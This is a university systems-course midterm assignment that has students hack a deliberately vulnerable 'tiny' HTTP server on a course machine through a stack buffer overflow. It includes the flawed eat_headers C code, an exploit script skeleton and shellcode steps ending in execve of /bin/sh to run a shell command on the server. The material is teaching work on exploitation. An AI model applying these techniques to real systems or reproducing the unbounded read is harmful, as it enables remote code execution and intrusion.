cs24-23fa Midterm: Adventure

Introduction to Computing Systems (Fall 2023)

Introduction

Over the past few weeks, we have discussed representation, assembly, the stack, and buffer overflows. In this midterm, you will put all of this together to hack into one of our servers.

Setup

Like usual, you should register for the assignment by going to https://grinch.caltech.edu/register which will create you a repository on gitlab with the starter code.

The Scenario

John is a recently graduated CS major who is working for Adventures Incorporated (tm). He was tasked with creating their website which he finally got running here:

http://adventure.com.puter.systems/index.html


Unfortunately, John didn’t go to Caltech or learn about systems; so, he used a small HTTP server that he found on the internet called tiny: https://gitlab.caltech.edu/john/adventures-tiny-server

Even more unfortunately, John was having problems getting the “save progress” feature working. So, he wrote some debugging code and accidentally left it in production…

Your Task

Your task for this midterm is to write several buffer overflow exploits in tiny to get various forms of your password on the server. By the end of this midterm, you will have arbitrary code execution on the remote machine. Please remember the honor code here–you wil be able to delete other students’ progress, but we’re expecting you to not do this. In an effort to make this as real as possible, we are going to rely heavily on the honor code for this one. Please don’t take advantage.

Orienting Yourself

The first thing you’ll have to do for this assignment is explore the webserver you’ll be hacking. tiny is set up to give a directory listing if you access a page that matches the structure of the files on the server. This is an standard web server feature that should usually be turned off, but not on John’s website! If you access the root (the website without index.html), it will list the root directory. Several directories are “forbidden” (namely, config and tokens), and these are the ones you will be hacking.

The webserver has been run from the /hackme/tiny directory. For example, if you run ls on the config directory, you’d get the following:

Terminal

john@adventure.com.puter.systems:~ls /hackme/tiny/config
admin_token

All the other files in /hackme/tiny are also useful, but we’ll let you explore them yourself. In particular, you might find it useful to download the binary itself (consider using wget URL_FOR_TINY) which John helpfully called tiny and left in the root directory of the website. This binary should run and be gdb-able on labradoodle.


Throughout this midterm, we will refer to your “password”. All passwords for this midterm are 10 characters long. Click Here to fill in your username and password throughout this specification.

There are three “stages” to this midterm, and we strongly recommend you complete them in order:

The attacks necessary to get these results get increasingly difficult. We will, however, explain the exploits you should be writing for each stage. Determining what code is exploitable is not a major goal of this midterm; instead, we will focus on actually writing the attacks once an exploit has been identified.

HTTP Requests and Responses

When you type a URL into your browser, it communicates with the remote server via an “HTTP request” which looks like this example:

GET / HTTP/1.1
Host: www.caltech.edu
Connection: close

This request is made up of several sections:

As a raw string, the HTTP request above looks like:

b"GET / HTTP/1.1\r\nHost: www.caltech.edu\r\nConnection: close\r\n\r\n"

Notice the \r\n after the first line, the \r\n between headers, and the trailing \r\n\r\n before any data (of which this request has none). Also notice the b in front of the string; this indicates that it is a byte string. For our purposes, all you really need to know is (1) we should always use byte strings when sending over a connection, and (2) you can concacentate them like regular strings.

This midterm will require manipulating raw HTTP requests. So, we have drafted a little script in python3 for you which sends a request to www.caltech.edu and prints out the data sent back. Note that this script isn’t actually complete. You need to put the pieces of the request together in the request line.

example-request.py

import socket

METHOD = b"GET"
URL = b"/"
HEADERS = b"Host: www.caltech.edu"

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# By default, web browsers request unencrypted websites on port 80.
# We want to simulate a "default" request here.
client.connect(("caltech.edu", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())

Uh Oh, Buffer Overflow…

Consider the following snippet of code which can be found in eat.c (part of the tiny webserver). Note that HEADERS_SIZE is a constant defined elsewhere.

eat.c

int eat_headers() {
	char garbage[HEADERS_SIZE];
	i = 0;
	garbage[0] = getc(stream);
	i++;
	garbage[1] = getc(stream);
	i++;
	garbage[2] = getc(stream);
	i++;
	garbage[3] = getc(stream);

	while (garbage[i - 3] != '\r' || garbage[i - 2] != '\n' ||
               garbage[i - 1] != '\r' || garbage[i]     != '\n') {
		i++;
		garbage[i] = getc(stream);
	}
	return 1;
}

As advertised, this function “eats” (reads and discards) the HTTP headers of a connection called stream. tiny is not written very well, and stream and i are both global variables. Unfortunately (or fortunately for us!), this code is written poorly and is susceptible to a buffer overflow attack!

Converting an Address Into Bytes

When writing exploit strings, it is often very important to convert between a numerical address and the corresponding string made up of raw bytes.

Hex Number: 0xdeadbeef
Raw String: b'\xef\xbe\xad\xde\x00\x00\x00\x00'

Notably, the order of the bytes in the raw string is backwards, because we’re working on a little-endian machine. This can be very annoying to do by hand; luckily, python3 gives us a function that makes it easy:

def to_bytes(i, l=8):
    return int.to_bytes(i, length=l, byteorder='little')

We strongly recommend that any python scripts you write or use for this midterm are executed with python3 NOT python2!

From HTTP Request to Exploit

All three attacks you will write will involve preparing exploit strings of varying complexities. Usually, they will consist of two pieces: (1) padding bytes and (2) a return address. We will send these in the headers of the HTTP requests, because eat_headers has the bug we’re exploiting. All together, the core of the script you’ll be writing looks like this:

sploit.py

import socket

# Method should always be get
METHOD = b"GET"

# We don't care what URL we're grabbing; they all have the possibility of exploit...
URL = b"/"

# Figure out how many bytes we need to pad until we get to the return address
# on the stack. (Hint: It's not 10...)
N = 10
PADDING = b"\xff" * N

# Fill this in with the address you actually want instead of `0xdeadbeef`
ADDRESS = to_bytes(0xdeadbeef)

# The "exploit string" is what we send in as the headers
HEADERS = PADDING + ADDRESS

# The functions we call will often look in the request's data for a password.
# So, we send it here.
DATA = b"YOUR_PASSWORD"

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("adventure.com.puter.systems", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())

Stage 1: Return to a function (20 points)

In this exploit, you will change a return address on the stack to make tiny execute a different function of your choice.

Stage 1.5: Running Your Own tiny (0 points)

We will need to get some information about tiny as it executes; so, we’ll have to get our own instance of tiny running on labradoodle.

Making tiny Executable

In the last stage, you downloaded tiny, but if you tried to run it you might have gotten an error message (-bash: ./tiny: Permission denied). This is because we need to mark the file as “executable”. To do this, run chmod +x tiny. Now, you’ll be able to run tiny on your own. Note that tiny takes an argument which is the port to run it on. Choose (and remember!) some number larger than 9000 as this argument. However, to capture debugging information, we’ll need to use a debugger.

Using gdb to inspect tiny while it runs

We have a short tutorial for gdb which can be found here which we recommend you read before continuing. Here is an example gdb session during which we run tiny and determine what address the clientaddr variable in the accept_connection function is stored at:

Terminal

blank@labradoodle:~gdb ./tiny
GNU gdb (GDB; openSUSE Leap 15.0) 8.3.1
...
>>> b accept_connection
Breakpoint 1 at 0x400fd7: file junk.c, line 69.
>>> run PORT
>>> p &clientaddr
$1 = (struct sockaddr_in *) ADDRESS

Why Bother?

In the next stage, we will need the address of the garbage buffer in eat_headers. The process to getting the address of this buffer is very similar to our example. You should follow approximately the same steps with the following exceptions:

Stage 2: Return to your own code (45 points)

In the first stage, we caused execution to jump to an existing function and run it. This is already really powerful, but we can do better! What if, instead of jumping to code that exists, we jumped to our own code? In this exploit, you will cause tiny to jump to code of your own design which will call several existing functions to complete your goal.

Shellcode

At its core, code is just executable bytes at a memory location. Remember that eat_headers helpfully reads the bytes we send onto the stack. So, is there any reason we can’t execute bytes on the stack? In the first attack, we replaced the return address with the address of a particular function, but this time, we’ll replace it with the address where our code will be…on the stack. Just like you had to carefully count bytes to calculate where to put the address, this time you will need to do a similar count to figure out where you’re putting your bytes that represent code. This will be some kind of offset from garbage’s address as calculated in the previous stage.

The “code” that we write as an exploit is usually called “shellcode”; it’s named that way, because the goal of the shellcode is usually to start a shell. In stage 3, we will do exactly this!

(N.B. In the real world, a new protection (an “NX bit”) was put in place to avoid exactly what we’re about to do, but it’s turned off for the purposes of this midterm.)

Absolute Calls

You will likely find yourself trying to callq a particular address in this exploit. Unfortunately, if you try this naively, like so:

bad-call.s

callq *$0xdeadbeef

You get the following output:

Terminal

blank@labradoodle:~as bad-call.s
Error: immediate operand illegal with absolute jump

That is, you cannot directly jump to an immediate address. Instead, you must put it in a register first, like this:

better-call.s

movq $0xdeadbeef, %rax
callq *%rax

Note that you should use cs24-dasm or gdb to get the actual bytes of the shellcode exploit you write after compiling it with as.

With a careful application of these concepts, you have enough to write this exploit!

Stage 3: Execute a shell command (25 points)

Finally, you will implement the holy grail. In this exploit, you will force tiny to run your shellcode to load and execute a shell with a bash script of your own design. In reality, this script could do anything you wanted. For the purposes of this midterm, it will create a file on the file system.

System Calls and the syscall Instruction

A system call is a request to the operating system (specifically, the kernel) to complete an operation for the user program. You’ve used many system calls without knowing it; all the file operations are, at their core, system calls, for example. We’ll talk much more about these later, but, for now, it suffices to know that if we want to execute a program, we can ask the OS to do it for us using the execve system call.

Because we’re writing shellcode, we need to know how to request a system call from assembly. To do this, one uses the syscall instruction which behaves very similarly to callq except that it takes arguments in different registers. Every syscall has a “number” that tells the OS which operation to complete. A full list can be found at https://filippo.io/linux-syscall-table/. For our purposes, we will only care about exit (which is #60) and execve (which is #59).

Use the following registers to complete a syscall:

Syscall # Param 1 Param 2 Param 3 Param 4 Param 5 Param 6
%rax %rdi %rsi %rdx %r10 %r8 %r9

Then, to complete an exit(0) system call, we’d write the following x86-64 code:

movq $60, %rax  ; use the exit syscall
movq $0, %rdi   ; error code 0
syscall         ; make syscall

The execve System Call

To really understand what execve is doing, we must understand processes which we won’t get to until later. So, we’ll provide a working definition that will be enough to do the current assignment.

execve() executes the program pointed to by filename. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments. The execve system call has the following signature:

int execve(const char *filename, char *const argv[], char *const envp[]);

Notably, since we will be making a syscall to execve in assembly, we will have to manually set up all arguments (and their contents and pointers)! Getting those right will be the hardest part of this exploit!

Shells and Shell Scripts

When you type into a terminal, there is a program (called a “shell”) which interprets what you write and executes the commands you write. (Incidentally, it does this using the execve syscall from above…) Specifically, the shell program most commonly used is called sh (or bash) and can be found at /bin/sh on most machines. This is the program that you will be execveing using your h4x0r skillz! In particular, since you are trying to put a token with particular contents and password, the shell script you will want to run will be:

/bin/sh -c 'echo -n "USERNAME" | sha384sum > /hackme/tiny/tokens/PASSWORD'

Note that /bin/sh is the name of the program and -c and the rest of the line are its two arguments. Do not include the quotes in the second argument in your exploit.

That is, your arguments array to execve should look like {"/bin/sh", "-c", "echo -n USERNAME | sha384sum > /hackme/tiny/tokens/PASSWORD", NULL}.

As you have likely gathered at this point, you could send whatever command you wanted to do whatever nasty things you wanted on a machine if you can execve /bin/sh!

Putting it all together


Extra Credit: Proof of Arbitrary Code Execution (+5 points)

Given the third task gives you a shell, you can now do arbitrary code execution. To prove that you understand what you’ve done, add a new link to the index.html page as well as a corresponding directory and index.html page for your link. Make sure to sign the page in some way using your access username.